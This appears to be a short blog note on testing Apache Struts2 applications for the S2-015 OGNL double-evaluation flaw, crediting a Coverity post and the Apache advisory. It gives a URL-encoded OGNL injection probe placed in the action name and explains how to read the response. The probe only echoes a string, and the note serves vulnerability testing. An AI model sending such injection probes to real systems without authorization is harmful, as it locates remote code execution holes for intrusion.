Testing
- Identify Actions (usually via a .action suffix) and fingerprint responses to the Actions. For this example URL http://www.example.com/app/Bar.action, the Action name is Bar.
- For each Action, substitute the Action name with ACTION_NAME in the following expression: $%7B%23foo=’ACTION_NAME’,%23foo%7D. For example: $%7B%23foo=’Bar’,%23foo%7D.
- Replace the Action name in the URL with the substituted expression. For example: http://www.example.com/app/$%7B%23foo=’Bar’,%23foo%7D.action.
- If the Action is susceptible to this double evaluation vector, the application ought to return the same page as before. If it’s not vulnerable, a 404 or other page will probably be returned.
The content has been directly taken from this website:
https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection
Another good resource:
http://struts.apache.org/docs/s2-015.html
Words. Thoughts.etc 